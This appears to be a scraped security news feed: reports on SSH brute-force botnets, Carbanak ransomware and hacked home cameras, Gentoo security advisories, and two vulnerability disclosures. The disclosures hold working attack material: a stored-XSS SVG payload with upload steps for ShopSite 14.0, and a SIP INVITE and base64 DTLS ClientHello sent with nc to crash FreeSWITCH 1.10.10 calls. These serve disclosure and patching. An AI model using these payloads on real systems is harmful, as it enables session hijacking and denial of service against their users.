Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks.
"Threat actors can also choose to install only scanners and sell the breached IP and account credentials on

Malware / Server Security

Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks.

"Threat actors can also choose to install only scanners and sell the breached IP and account credentials on the dark web," the AhnLab Security Emergency Response Center (ASEC) said in a report on Tuesday.

In these attacks, adversaries try to guess a server's SSH credentials by running through a list of commonly used combinations of usernames and passwords, a technique called dictionary attack.

Should the brute-force attempt be successful, it's followed by the threat actor deploying other malware, including scanners, to scan for other susceptible systems on the internet.

Specifically, the scanner is designed to look for systems where port 22 -- which is associated with the SSH service -- is active and then repeats the process of staging a dictionary attack in order to install malware, effectively propagating the infection.

Another notable aspect of the attack is the execution of commands such as "grep -c ^processor /proc/cpuinfo" to determine the number of CPU cores.

"These tools are believed to have been created by PRG old Team, and each threat actor modifies them slightly before using them in attacks," ASEC said, adding there is evidence of such malicious software being used as early as 2021.

To mitigate the risks associated with these attacks, it's recommended that users rely on passwords that are hard to guess, periodically rotate them, and keep their systems up-to-date.

The findings come as Kaspersky revealed that a novel multi-platform threat called NKAbuse is leveraging a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel for DDoS attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Warning: Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining

ShopSite version 14.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: ShopSite Version: 14.0 - Stored XSS# Date: 2023-12-25# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://www.shopsite.com/# Version: 14.0# Tested on: https://www.shopsite.com/demo.html1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgipoc.svg<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">    <script>//<![CDATA[        alert(document.domain)    //]]>    </script></svg>2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg

ShopSite 14.0 Cross Site Scripting

When handling DTLS-SRTP for media setup, FreeSWITCH version 1.10.10 is susceptible to denial of service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

# FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation

- Fixed versions: 1.10.11  
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-02-freeswitch-dtls-hello-race  
- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6  
- Other references: CVE-2023-51443  
- Tested vulnerable versions: 1.10.10  
- Timeline:  
  - Report date: 2023-09-27  
  - Triaged: 2023-09-27  
  - Fix provided for testing: 2023-09-29  
  - Vendor release with fix: 2023-12-22  
  - Enable Security advisory: 2023-12-22

## TL;DR

When handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

## Description

Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.

This behavior was tested against FreeSWITCH version 1.10.10, which was found to be vulnerable to this issue.

The following sequence diagram shows the normal flow (i.e. no attack) involving SIP and DTLS messages between a UAC (the Caller) and an FreeSWITCH server capable of handling WebRTC calls.

Diagram showing a call setup against FreeSWITCH that uses SIP and DTLS:  
https://user-images.githubusercontent.com/4557407/271063734-85425e09-6945-49b1-ba73-751b6d592ea4.png

In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to FreeSWITCH's media port from a different IP and port, FreeSWITCH responded by sending a DTLS Alert to the Caller. Additionally, FreeSWITCH terminated the SIP call by sending a BYE message to the Caller.

Diagram showing a call setup against FreeSWITCH that fails due to an attacker controlled DTLS ClientHello:  
https://user-images.githubusercontent.com/4557407/271064011-032f9a0e-15af-4645-b008-1fe8b706d75e.png

During a real attack, the attacker would spray a vulnerable FreeSWITCH server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.

## Impact

Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP.

## How to reproduce the issue

1. Prepare a FreeSWITCH server with an extension configured to handle WebRTC  
1. Send an INVITE message to the target server with WebRTC SDP:

    ```default  
  INVITE sip:1000@192.168.1.202 SIP/2.0  
  Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ  
  Max-Forwards: 70  
  From: <sip:1000@192.168.1.202>;tag=L9kc5NfpYG1u67cT  
  To: <sip:1000@192.168.1.202>  
  Contact: <sip:1000@192.168.1.202>  
  Call-ID: DzGnBLt0z9SK3MC0  
  CSeq: 5 INVITE  
  Content-Type: application/sdp  
  Content-Length: 385

  v=0  
  o=- 1695296331 1695296331 IN IP4 192.168.1.202  
  s=-  
  t=0 0  
  c=IN IP4 192.168.1.202  
  m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101  
  a=setup:active  
  a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3  
  a=rtpmap:0 PCMU/8000/1  
  a=rtpmap:8 PCMA/8000/1  
  a=rtpmap:101 telephone-event/8000  
  a=rtcp-mux  
  a=rtcprsize  
  a=sendrecv  
  ```  
1. Note FreeSWITCH's media port and IP values, which will be used as the `<freeswitch-ip>` and `<media-port>` parameters by the Attacker  
1. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the FreeSWITCH server

    ```bash  
  CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA"   
  CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"  
  CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"  
  CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"  
  CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="  
  echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <freeswitch-ip> <media-port>  
  ```  
1. Observe that the Caller received a DTLS Alert message and a SIP BYE message on its signaling channel

Note that the above steps are used to reliably reproduce the vulnerability. In case of a real attack, the attacker simply has to spray the FreeSWITCH server with DTLS messages.

## Solution and recommendations

To address this vulnerability, upgrade FreeSWITCH to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.

[^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764

--

     Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:       AG Charlottenburg HRB 173016 B  
    Company HQ:                       Neuburger Straße 101 b, 94036 Passau, Germany  
    RTCSec Newsletter:               https://www.rtcsec.com/subscribe  
    Our blog:                                https://www.rtcsec.com  
    Other points of contact:       https://www.enablesecurity.com/contact/

FreeSWITCH 1.10.10 Denial Of Service

Gentoo Linux Security Advisory 202312-14 - Multiple vulnerabilities have been discovered in FFmpeg, the worst of which could lead to code execution. Versions greater than or equal to 6.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: FFmpeg: Multiple Vulnerabilities  
     Date: December 23, 2023  
     Bugs: #795696, #842267, #881523, #903805  
       ID: 202312-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilitiies have been discovered in FFmpeg, the worst of  
which could lead to code execution

Background  
=========  
FFmpeg is a complete solution to record, convert and stream audio and  
video.

Affected packages  
================  
Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
media-video/ffmpeg  < 6.0         >= 6.0

Description  
==========  
Multiple vulnerabilities have been discovered in FFmpeg. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All FFmpeg 4 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-video/ffmpeg-4.4.3"

All FFmpeg 6 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-video/ffmpeg-6.0"

References  
=========  
[ 1 ] CVE-2021-33815  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33815  
[ 2 ] CVE-2021-38171  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38171  
[ 3 ] CVE-2021-38291  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38291  
[ 4 ] CVE-2022-1475  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1475  
[ 5 ] CVE-2022-3964  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3964  
[ 6 ] CVE-2022-3965  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3965  
[ 7 ] CVE-2022-48434  
      https://nvd.nist.gov/vuln/detail/CVE-2022-48434

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-14

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-14

Gentoo Linux Security Advisory 202312-13 - Multiple vulnerabilities have been discovered in Gitea, the worst of which could result in information leakage. Versions greater than or equal to 1.20.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Gitea: Multiple Vulnerabilities  
     Date: December 23, 2023  
     Bugs: #887825, #891983, #905886, #918674  
       ID: 202312-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Gitea, the worst of  
which could result in information leakage.

Background  
=========  
Gitea is a painless self-hosted Git service.

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
www-apps/gitea  < 1.20.6      >= 1.20.6

Description  
==========  
Multiple vulnerabilities have been discovered in Gitea. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Gitea users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apps/gitea-1.20.6"

References  
=========  
[ 1 ] CVE-2023-3515  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3515

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-13

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-13

Gentoo Linux Security Advisory 202312-12 - Several vulnerabilities have been found in Flatpack, the worst of which lead to privilege escalation and sandbox escape. Versions greater than or equal to 1.14.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Flatpak: Multiple Vulnerabilities  
     Date: December 23, 2023  
     Bugs: #775365, #816951, #831087, #901507  
       ID: 202312-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Several vulnerabilities have been found in Flatpack, the worst of which  
lead to privilege escalation and sandbox escape.

Background  
=========  
Flatpak is a Linux application sandboxing and distribution framework.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/flatpak  < 1.14.4      >= 1.14.4

Description  
==========  
Multiple vulnerabilities have been discovered in Flatpak. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Flatpak users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/flatpak-1.14.4"

References  
=========  
[ 1 ] CVE-2021-21381  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21381  
[ 2 ] CVE-2021-41133  
      https://nvd.nist.gov/vuln/detail/CVE-2021-41133  
[ 3 ] CVE-2021-43860  
      https://nvd.nist.gov/vuln/detail/CVE-2021-43860  
[ 4 ] CVE-2022-21682  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21682  
[ 5 ] CVE-2023-28100  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28100  
[ 6 ] CVE-2023-28101  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28101  
[ 7 ] GHSA-67h7-w3jq-vh4q  
[ 8 ] GHSA-xgh4-387p-hqpp

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-12

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-12

Gentoo Linux Security Advisory 202312-11 - A vulnerability has been found in SABnzbd which allows for remote code execution. Versions greater than or equal to 4.0.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: SABnzbd: Remote Code Execution  
     Date: December 23, 2023  
     Bugs: #908032  
       ID: 202312-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in SABnzbd which allows for remote code  
execution.

Background  
=========  
Free and easy binary newsreader with web interface.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-nntp/sabnzbd  < 4.0.2       >= 4.0.2

Description  
==========  
A vulnerability has been discovered in SABnzbd. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
A design flaw was discovered in SABnzbd that could allow remote code  
execution. Manipulating the Parameters setting in the Notification  
Script functionality allows code execution with the privileges of the  
SABnzbd process. Exploiting the vulnerabilities requires access to the  
web interface. Remote exploitation is possible if users exposed their  
setup to the internet or other untrusted networks without setting a  
username/password. By default SABnzbd is only accessible from  
`localhost`, with no authentication required for the web interface.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All SABnzbd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-nntp/sabnzbd-4.0.2"

References  
=========  
[ 1 ] CVE-2023-34237  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34237

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-11

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-11

Gentoo Linux Security Advisory 202312-10 - A vulnerability has been found in Ceph which can lead to root privilege escalation. Versions greater than or equal to 17.2.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Ceph: Root Privilege Escalation  
     Date: December 23, 2023  
     Bugs: #878277  
       ID: 202312-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in Ceph which can lead to root privilege  
escalation.

Background  
=========  
Ceph is a distributed network file system designed to provide excellent  
performance, reliability, and scalability.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-cluster/ceph  < 17.2.6      >= 17.2.6

Description  
==========  
A vulnerability has been discovered in Ceph. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
The ceph-crash.service runs the ceph-crash Python script as root. The  
script is operating in the directory /var/lib/ceph/crash which is  
controlled by the unprivileged ceph user (ceph:ceph mode 0750). The  
script periodically scans for new crash directories and forwards the  
content via `ceph crash post`.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Ceph users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-cluster/ceph-17.2.6"

References  
=========  
[ 1 ] CVE-2022-3650  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3650

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-10

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-10

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics.
"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.
"Carbanak returned last month through new

The banking malware known as **Carbanak** has been observed being used in ransomware attacks with updated tactics.

"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.

"Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software."

Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero.

Carbanak, detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to trigger the deployment of Carbanak.

The development comes as 442 ransomware attacks were reported last month, up from 341 incidents in October 2023. A total of 4,276 cases have been reported so far this year, which is "less than 1000 incidents fewer than the total for 2021 and 2022 combined (5,198)."

The company's data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks.

As for the most commonly spotted ransomware families, LockBit, BlackCat, and Play contributed to 47% (or 206 attacks) of 442 attacks. With BlackCat dismantled by authorities this month, it remains to be seen what impact the move will have on the threat landscape for the near future.

"With one month of the year still to go, the total number of attacks has surpassed 4,000 which marks a huge increase from 2021 and 2022, so it will be interesting to see if ransomware levels continue to climb next year," Matt Hull, global head of threat intelligence at NCC Group, said.

The spike in ransomware attacks in November has also been corroborated by cyber insurance firm Corvus, which said it identified 484 new ransomware victims posted to leak sites.

"The ransomware ecosystem at large has successfully pivoted away from QBot," the company said. "Making software exploits and alternative malware families part of their repertoire is paying off for ransomware groups."

While the shift is the result of a law enforcement takedown of QBot's (aka QakBot) infrastructure, Microsoft, last week, disclosed details of a low-volume phishing campaign distributing the malware, underscoring the challenges in fully dismantling these groups.

The development comes as Kaspersky revealed Akira ransomware's security measures prevent its communication site from being analyzed by raising exceptions while attempting to access the site using a debugger in the web browser.

The Russian cybersecurity company further highlighted ransomware operators' exploitation of different security flaws in the Windows Common Log File System (CLFS) driver – CVE-2022-24521, CVE-2022-37969, CVE-2023-23376, CVE-2023-28252 (CVSS scores: 7.8) – for privilege escalation.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Carbanak Banking Malware Resurfaces with New Ransomware Tactics

By Waqas
Cheap Security, Costly Privacy: Vietnamese Group Profits from Hacked Home Cameras by Selling Bedroom Camera Footage- Change Your Passwords Now!
This is a post from HackRead.com Read the original post: Vietnamese Group Hacks and Sells Bedroom Camera Footage

A group of Vietnamese individuals involved in cybercrime is hacking into home security cameras of unsuspecting users and selling private and intimate footage on Telegram for a mere $16.

A Vietnam-based Telegram group has been discovered selling private footage obtained from hacked security cameras, showcasing what they describe as ‘dark corners’ and ‘hot scenes.’ Security experts attribute this privacy breach to poor password hygiene as the primary cause.”

In 2021, cybersecurity researchers at BitDefender debated whether Telegram, an encrypted messaging app, had become the new dark web. As the world approaches 2024, the significance of this argument has never been more evident.

According to details shared by security researcher Minh Hung, who first discovered the notorious Telegram group and published by Vnexpress, the group offers three packages for accessing the hacked footage.

The cheapest package costs 150,000 Vietnamese Dong ($6.16), while the highest package costs VND500,000 ($20.53). The top tier, ‘Super VIP,’ includes 4 years’ worth of hacked footage from hundreds of cameras and live access for VND800,000 ($32.84).

This group claims to specialize in hacking into “private cameras of families and shops in Vietnam” and invited Hung to join them on the channel.

Hackread.com also managed to identify Vietnamese-language Telegram channels offering malicious footage stolen from hacked home security cameras. The screenshots below were taken by Hackread.com:

On the other hand, according to Vnexpress’s report, Hung could watch the videos for the first and second packages, but with the third package, he could download an application from a camera firm and watch live feeds using the provided QR codes. Hung suspected it to be a scam but paid VND800,000 to check it out.

Hung further discovered that the timestamps on security camera feeds matched the current time. Using the application, he could access 15 cameras installed in clothing shops and spas, including bedrooms, living rooms, and dressing rooms.

****Should You Install Security Cameras in Your Bedroom?****

Installing security cameras in your bedroom raises significant privacy concerns and is generally considered a bad idea. The bedroom is an intimate space where individuals expect the highest level of privacy. Placing cameras in this area not only invades personal boundaries but also raises ethical issues.

The footage captured in bedrooms can include highly sensitive and personal moments, compromising one’s privacy and dignity. Beyond the ethical aspect, it also poses a risk of unauthorized access by hackers, as demonstrated by this article.

Additionally, such surveillance within the confines of a home may lead to legal implications, as it potentially violates laws related to privacy. To maintain a sense of security and privacy, it is advisable to install cameras in public areas of the home while avoiding intrusion into personal spaces like bedrooms.

**How to Protect Your Security Camera from Hackers?**

whether at home or work, protecting your security cameras from hackers is crucial to protect your privacy and security. Here are some vital tips to help you enhance the security of your security camera system:

1.  **Update Firmware Regularly:**  
    Ensure that your security camera’s firmware is up to date. Manufacturers often release updates that address security vulnerabilities, so regularly check for and install firmware updates.
2.  **Use Strong Passwords:**  
    Create strong, unique passwords for your camera’s login credentials. Avoid default passwords and choose a combination of letters, numbers, and special characters. Change passwords regularly and avoid using easily guessable information.
3.  **Network Security:**  
    Secure your home network by setting up a strong Wi-Fi password and using WPA3 encryption if available. Restrict access to your network by using a strong, unique network password.
4.  **ALWAYS** **Change Default Settings:**  
    Change default usernames and passwords on your security cameras. Default credentials are often well-known and exploited by hackers.
5.  **Enable Two-Factor Authentication (2FA):**  
    Whenever possible, enable two-factor authentication on your security camera accounts. This adds an extra layer of security by requiring a second form of verification, such as a code sent to your mobile device.
6.  **Regularly Check for Suspicious Activity:**  
    Monitor your camera system for any unusual or unauthorized access. Regularly review footage and set up alerts for suspicious activities, such as multiple failed login attempts.
7.  **Keep Cameras Offline When Not in Use:**  
    Consider disconnecting your security cameras from the internet when you don’t need remote access. This can be done by configuring your router to block camera access during certain hours.
8.  **Purchase from Reputable Brands:**  
    Choose security cameras from reputable manufacturers with a track record of providing regular firmware updates and security patches.
9.  **Secure Physical Access:**  
    Ensure that physical access to your cameras is restricted. Place cameras in locations that are not easily accessible, and consider installing them at a height to prevent tampering.
10.  **Regularly Review Camera Logs:**  
    Some advanced camera systems provide logs of access and activities. Regularly review these logs for any suspicious entries.

****_RELATED ARTICLES_****

1.  **ThroughTek Flaw Exposed Millions of IoT Cameras to Spying**
2.  **Whitehat hacker shows how to detect hidden cameras in hotels**
3.  **3TB of clips from exposed home security cameras posted online**
4.  **This creepy site shows live footage from 73K Private Security Cameras**
5.  **Israeli Rabbi arrested for hacking CCTV cam at women’ bathing suit shop**

Tag

#web